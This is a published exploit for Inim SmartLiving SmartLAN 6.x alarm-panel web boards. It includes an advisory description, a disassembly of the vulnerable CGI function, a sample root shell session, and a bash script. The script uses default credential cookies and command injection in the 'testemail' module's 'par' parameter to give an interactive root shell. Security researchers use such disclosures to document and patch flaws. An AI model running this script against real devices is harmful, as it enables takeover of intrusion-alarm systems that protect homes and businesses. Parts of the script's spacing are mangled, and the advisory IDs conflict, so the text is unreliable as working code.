# Exploit Title: Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution# Author: LiquidWorm# Date: 2019-12-09# Product web page: https://www.inim.biz# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?# Version: 6.x# Advisory ID: ZSL-2019-5545# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5545.php#!/bin/bash### Inim Electronics SmartLiving SmartLAN/G/SI <=6.x Root Remote Command Execution### Vendor: INIM Electronics s.r.l.# Product web page: https://www.inim.biz# Link: https://www.inim.biz/en/antintrusion-control-panels/home-automation/control-panel-smartliving?# Affected version: <=6.x# Affected models: SmartLiving 505#SmartLiving 515#SmartLiving 1050, SmartLiving 1050/G3#SmartLiving 10100L, SmartLiving10100L/G3## Summary: SmartLiving anti-intrusion control panel and security system provides# important features rarely found in residential, commercial or industrial application# systems of its kind. This optimized-performance control panel provides first-rate# features such as: graphic display, text-to-speech, voice notifier, flexible hardware,# end-to-end voice transmission (voice-on-bus), IP connectivity.## SMARTLAN/SI:# The system-on-chip platform used in the SmartLAN/SI accessory board provides point-to-point# networking capability and fast connectivity to the Internet. Therefore, it is possible# to set up a remote connection and program or control the system via the SmartLeague# software application. In effect, the SmartLAN/SI board grants the same level of access# to the system as a local RS232 connection.## SMARTLAN/G:# The SmartLAN/G board operates in the same way as the SmartLAN/SI but in addition provides# advanced remote-access and communication functions. The SmartLAN/G board is capable of# sending event-related e-mails automatically. Each e-mail can be associated with a subject,# an attachment and a text message. The attachment can be of any kind and is saved to an# SD card. The message text can contain direct links to domains or IP addressable devices,# such as a security cameras. In addition to e-mails, the SmartLAN/G board offers users# global access to their control panels via any Internet browser accessed through a PC,# PDA or Smartphone. In fact, the SmartLAN/G has an integrated web-server capable of# distinguishing the means of connection and as a result provides an appropriate web-page# for the tool in use. Smartphones can control the system in much the same way as a# household keypad, from inside the house or from any part of the world.## Desc: SmartLiving SmartLAN suffers from an authenticated remote command injection vulnerability.# The issue exist due to the 'par' POST parameter not being sanitized when called with# the 'testemail' module through web.cgi binary. The vulnerable CGI binary (ELF 32-bit# LSB executable, ARM) is calling the 'sh' executable via the system() function to issue# a command using the mailx service and its vulnerable string format parameter allowing# for OS command injection with root privileges. An attacker can remotely execute system# commands as the root user using default credentials and bypass access controls in place.## ================= dissassembly of vuln function =================##[0x0000c86c]> pd @ 0x000c86c#| ;-- pc:#| ;-- r15:#| 0x0000c86cldr r1, str.testemail ; [0xed96:4]=0x74736574 ; "testemail" ; const char * s2#| 0x0000c870bl sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)#| 0x0000c874cmp r0, 0#| 0x0000c878bne 0xc8b8#| 0x0000c87ccmp sl, 0#| 0x0000c880beq 0xd148#| 0x0000c884bl sym.set_no_cache#| 0x0000c888add r5, sp, 0x20#| 0x0000c88cmov r0, r4#| 0x0000c890ldr r1, str.application_json ; [0xeda0:4]=0x6c707061 ; "application/json"#| 0x0000c894bl sym.imp.qcgires_setcontenttype#| 0x0000c898mov r0, r5; char *s#| 0x0000c89cmov r1, 0xc8; 200 ; size_t#| 0x0000c8a0ldr r2, str.echo__Hello_____mailx__s__Email_test___s ; [0xedb1:4]=0x6f686365 ; "echo \"Hello!\" | mailx -s \"Email test\" %s" ; con#| 0x0000c8a4mov r3, r8; ...#| 0x0000c8a8bl sym.imp.snprintf ; int snprintf(char *s,#| 0x0000c8acmov r0, r5; const char * string#| 0x0000c8b0bl sym.imp.system ; int system(const char *string)#| 0x0000c8b4b 0xd134#|#| system() @0x0000c8b0 arguments: "sh -c echo "Hello!" | mailx -s "Email test" %s"#| Trigger suggest: $(curl -sik http://192.168.1.17/cgi-bin/web.cgi -X POST --data "mod=testemail&par=;/sbin/ifconfig" --cookie "user=admin;pass=pass;code=9999")#| Process: 1351 root 0:00 sh -c echo "Hello!" | mailx -s "Emaiil test" ;/sbin/ifconfig#|__# =================================================================## -----------------------------------------------------------------## root@kali:~# ./xpl.sh https://192.168.1.17# # Checking target: https://192.168.1.17# ACCESS GRANTED!# # root@ssl> id; uname -a; getconf LONG_BIT; cat ../version.html; pwd# uid=0(root) gid=0(root) groups=0(root),10(wheel)# Linux SmartLAN 3.2.1 #195 PREEMPT Thu May 30 15:26:27 CEST 2013 armv5tejl GNU/Linux# 32# <!-- SLF6.07 10100 --># <html><body><h2># SmartLiving 6.07 10100# <br><br>SmartLAN/G v. 6.11# /www/cgi-bin# root@ssl> exit# root@kali:~/# ## -----------------------------------------------------------------## Tested on: GNU/Linux 3.2.1 armv5tejl#Boa/0.94.14rc21#BusyBox v1.20.2### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# @zeroscience### Advisory ID: ZSL-2019-5544# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5544.php### 06.09.2019#
URL=$1
CGI="/cgi-bin/web.cgi"
COOK="user=admin;pass=pass;code=9999"
COOK1="user=admin;pass=pass;code=9998"
COOK2="user=user;pass=pass;code=0001"
PARAMS="mod=testemail&par=;"
CHECK=${URL:4:1}if["$#"-ne 1]; then
echo -en "\e[34m"
echo "==============================================="
echo " SmartLivingSmartLAN 6.x Remote Root Exploit"
echo -e "\t\tZSL-2019-5544"
echo "==============================================="
echo -en "\e[00m"
echo -e "\nUsage: $0 http(s)://ip:port\n"
exit 0
fi
echo -ne "\nChecking target: $URL\n"if["$CHECK"=="s"]; then
TEST=$(curl -sIk $URL 2>/dev/null | head -1| awk -F" "'{print $2}')if[["$?"="7"]]||[[ $TEST !="200"]]; then
echo "HTTPS with error!"
exit 0
fi
if curl -sik -X POST "$URL$CGI"-H "Cookie: $COOK"-d"${PARAMS}id"| grep uid 1>/dev/null
then
echo -e "ACCESS GRANTED!\n"else
echo "Invalid credentials."
exit 0
fi
while true; do
R="$(tput sgr0)"
S="$(tput setaf 2)"
read -rp "${S}root@ssl>${R} " CMD
if[["$CMD"=="exit"]]; then
exit 0
fi
curl -sik -X POST "$URL$CGI"-H "Cookie: $COOK"-d"$PARAMS${CMD}"| awk "/Connection: close/{j=1;next}j"| head -n -5
done
else
TEST=$(curl -sI $URL 2>/dev/null | head -1| awk -F" "'{print $2}')if[["$?"="7"]]||[[ $TEST !="200"]]; then
echo "HTTP with error!"
exit 0
fi
if curl -si -X POST "$URL$CGI"-H "Cookie: $COOK"-d"${PARAMS}id"| grep uid 1>/dev/null
then
echo -e "ACCESS GRANTED!\n"else
echo "Invalid credentials."
exit 0
fi
while true; do
R="$(tput sgr0)"
S="$(tput setaf 2)"
read -rp "${S}root@http>${R} " CMD
if[["$CMD"=="exit"]]; then
exit 0
fi
curl -si -X POST "$URL$CGI"-H "Cookie: $COOK"-d"$PARAMS${CMD}"| awk "/Connection: close/{j=1;next}j"| head -n -5
done
fi